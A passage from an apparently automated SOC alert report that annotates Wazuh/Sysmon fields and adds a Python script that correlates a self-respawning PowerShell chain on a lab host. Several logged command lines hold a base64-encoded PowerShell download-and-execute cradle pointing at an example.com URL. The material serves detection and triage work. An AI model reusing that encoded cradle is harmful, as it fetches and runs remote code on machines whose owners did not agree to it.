Numeric level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon's operational events are all Informational, so this says nothing about severity.

data.win.system.task:  11
Task category; for Sysmon events it simply mirrors the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:06.2461871Z
When the Event Log service stamped the record (UTC, 100 ns resolution). Sits between eventdata.utcTime and the Wazuh timestamp; the gap to the latter is your collection lag.

data.win.system.eventRecordID:  351151
Incremental log record number – handy for timeline order. Directly follows 351150, the Process Create of the same process.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on every event here), not the process being reported on.

data.win.system.threadID:  4740
Thread inside Sysmon that wrote the record. Forensic noise.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from; pair it with eventID to know which Sysmon event type you are looking at.

data.win.system.computer:  Attacker
Hostname the event was written on. Should match agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:06.240 ProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} ProcessId: 13988 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3wdrra44.odj.ps1 CreationUtcTime: 2025-04-24 22:57:06.240 User: Attacker\Attcker1"
Sysmon's rendered text for Event ID 11 (FileCreate). ProcessGuid equals the processGuid of the Process Create alert before it (PID 13988): the second PowerShell in the chain writing its own policy-test file, just as the first one did.

data.win.eventdata.utcTime:  2025-04-24 22:57:06.240
When Sysmon recorded the file create (UTC); about 1.5 s after the creating process started.

data.win.eventdata.processGuid:  {94294ddc-c1c0-680a-120d-000000000e00}
Sysmon GUID of the creating process. It matches the processGuid of the Process Create alert above (PID 13988), which is the join key between EID 1 and EID 11.

data.win.eventdata.processId:  13988
PID of the creating process; subject to reuse, prefer the GUID.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable that created the file.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3wdrra44.odj.ps1
Full path of the created file. Another __PSScriptPolicyTest_<random>.ps1, the file PowerShell writes at startup to test whether an AppLocker/WDAC script policy applies; benign on its own and the reason this rule has fired 144 times. Triage the process chain, not the file.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:06.240
The file's creation timestamp. Equal to utcTime here; if it were earlier, the file already existed and was overwritten (or timestomped).

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
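The two File Create alerts and the Process Create alerts around them share Sysmon processGuid values, and that join is what separates the benign __PSScriptPolicyTest file from the real problem, the self-respawning encoded PowerShell. The Python below is an added example, not SOCscribe's or Wazuh's code: it takes the EID 1 and EID 11 fields from the alerts on this page (constructed here as plain dicts, command lines abbreviated) and correlates them. The helper names, the file classes and the verdict strings are this example's own; that __PSScriptPolicyTest_*.ps1 is PowerShell's own policy probe is a general fact about PowerShell, not something the report states.

```python
import re

# Constructed records: the Sysmon eventdata fields from the Process Create and File Create
# alerts on this page, reduced to the fields the correlation needs. The encoded command line
# is abbreviated here; on the page it is identical for every process in the chain.
POWERSHELL = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED_CMD = f'"{POWERSHELL}" "{POWERSHELL}" -NoLogo -NoProfile -EncodedCommand <base64>'


def _proc(utc, guid, pid, parent_guid, parent_pid):
    return {"utcTime": utc, "processGuid": guid, "processId": pid, "image": POWERSHELL,
            "commandLine": ENCODED_CMD, "parentProcessGuid": parent_guid,
            "parentProcessId": parent_pid, "parentImage": POWERSHELL,
            "parentCommandLine": ENCODED_CMD}


EID1 = [  # Sysmon Event ID 1, Process Create
    _proc("2025-04-24 22:57:01.866", "{94294ddc-c1bd-680a-100d-000000000e00}", 13568,
          "{94294ddc-c1ba-680a-0e0d-000000000e00}", 16768),
    _proc("2025-04-24 22:57:04.713", "{94294ddc-c1c0-680a-120d-000000000e00}", 13988,
          "{94294ddc-c1bd-680a-100d-000000000e00}", 13568),
    _proc("2025-04-24 22:57:07.554", "{94294ddc-c1c3-680a-140d-000000000e00}", 16876,
          "{94294ddc-c1c0-680a-120d-000000000e00}", 13988),
]
TEMP = r"C:\Users\Attcker1\AppData\Local\Temp"
EID11 = [  # Sysmon Event ID 11, File Create
    {"utcTime": "2025-04-24 22:57:03.394", "processGuid": "{94294ddc-c1bd-680a-100d-000000000e00}",
     "processId": 13568, "targetFilename": TEMP + r"\__PSScriptPolicyTest_byyqns3s.1z0.ps1"},
    {"utcTime": "2025-04-24 22:57:06.240", "processGuid": "{94294ddc-c1c0-680a-120d-000000000e00}",
     "processId": 13988, "targetFilename": TEMP + r"\__PSScriptPolicyTest_3wdrra44.odj.ps1"},
]

# PowerShell writes this file itself on startup to learn whether an AppLocker/WDAC script
# policy applies to it. It is not the attacker's payload, so the file alone is no finding.
_POLICY_PROBE_RE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.psm?1$", re.IGNORECASE)
_TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
_EXEC_EXT = (".ps1", ".psm1", ".exe", ".dll", ".bat", ".cmd", ".vbs", ".js", ".hta")


def classify_file_create(target: str) -> str:
    """Label a FileCreate target: PowerShell's own probe, a real executable in Temp, or other."""
    if _POLICY_PROBE_RE.search(target):
        return "powershell_policy_probe"
    if _TEMP_RE.search(target) and target.lower().endswith(_EXEC_EXT):
        return "executable_in_temp"
    return "other"


def ancestry(guid: str, by_guid: dict) -> list:
    """PIDs from the process upward, ending with the first parent we have no EID 1 record for."""
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)  # guard against a corrupted record pointing at itself
        rec = by_guid[guid]
        chain.append(rec["processId"])
        guid = rec["parentProcessGuid"]
        if guid not in by_guid:
            chain.append(rec["parentProcessId"])
    return chain


def is_self_respawn(rec: dict) -> bool:
    """Same image and same command line as the parent: a script relaunching itself."""
    return (rec["image"].lower() == rec["parentImage"].lower()
            and rec["commandLine"] == rec["parentCommandLine"])


def correlate(eid1: list, eid11: list) -> list:
    """Join each File Create to its creator's process chain and decide what to do with it."""
    by_guid = {r["processGuid"]: r for r in eid1}
    findings = []
    for f in eid11:
        proc = by_guid.get(f["processGuid"])
        file_class = classify_file_create(f["targetFilename"])
        respawn = proc is not None and is_self_respawn(proc)
        if file_class == "powershell_policy_probe":
            verdict = "escalate_process_chain" if respawn else "close_benign"
        else:
            verdict = "review_file"
        findings.append({
            "file": f["targetFilename"], "file_class": file_class, "creator_pid": f["processId"],
            "chain_pids": ancestry(f["processGuid"], by_guid) if proc else [f["processId"]],
            "creator_is_respawn": respawn, "verdict": verdict,
        })
    return findings


def longest_chain(eid1: list) -> list:
    """The deepest parent chain visible in the records, newest process first."""
    by_guid = {r["processGuid"]: r for r in eid1}
    return max((ancestry(g, by_guid) for g in by_guid), key=len, default=[])


if __name__ == "__main__":
    for finding in correlate(EID1, EID11):
        print(finding)
    print("chain:", " -> ".join(map(str, longest_chain(EID1))))
```

On this page's data both file creates classify as the policy probe, yet both verdicts are escalate_process_chain, because the creator in each case is a PowerShell with the same image and command line as its parent; longest_chain returns 16876 → 13988 → 13568 → 16768, and the root PID 16768 has no Process Create in the report, which is the first thing to go and fetch.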

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:11.446+0000 | 🧠 MITRE: Execution – PowerShell [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:11.446+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  141
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535431.2977564
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Microsoft-Windows-Sysmon means the event ID and eventdata follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of that provider; this is Sysmon's fixed provider GUID, handy for exact-match filters.

data.win.system.eventID:  1
Event ID within the provider. Because the provider is Sysmon, 1 is Sysmon's ProcessCreate event, not a Security-log ID like 4624/4688 (the Security-log equivalent would be 4688).

data.win.system.version:  5
Schema version of the event record; the field layout can change between versions, so decoders key on it.

data.win.system.level:  4
Numeric level: 4 = Informational, 3 = Warning, 2 = Error. Sysmon's operational events are all Informational, so this says nothing about severity.

data.win.system.task:  1
Task category; for Sysmon events it simply mirrors the event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:08.8267106Z
When the Event Log service stamped the record (UTC, 100 ns resolution). Sits between eventdata.utcTime and the Wazuh timestamp; the gap to the latter is your collection lag.

data.win.system.eventRecordID:  351174
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on every event here), not the process being reported on.

data.win.system.threadID:  4740
Thread inside Sysmon that wrote the record. Forensic noise.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from; pair it with eventID to know which Sysmon event type you are looking at.

data.win.system.computer:  Attacker
Hostname the event was written on. Should match agent.name; a mismatch means forwarded events or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:07.554 ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} ProcessId: 16876 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1c0-680a-120d-000000000e00} ParentProcessId: 13988 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:07.554
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c3-680a-140d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1c0-680a-120d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13988
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:11.448+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:11.448+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  145
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535431.2985635
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:09.0424583Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351175
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:08.997 ProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} ProcessId: 16876 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0oi5rz3g.woj.ps1 CreationUtcTime: 2025-04-24 22:57:08.995 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:08.997
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c3-680a-140d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16876
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0oi5rz3g.woj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:08.995
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:13.800+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:13.800+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  142
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535433.2988404
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:11.4950021Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351211
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:10.231 ProcessGuid: {94294ddc-c1c6-680a-160d-000000000e00} ProcessId: 8744 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1c3-680a-140d-000000000e00} ParentProcessId: 16876 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:10.231
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1c6-680a-160d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8744
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

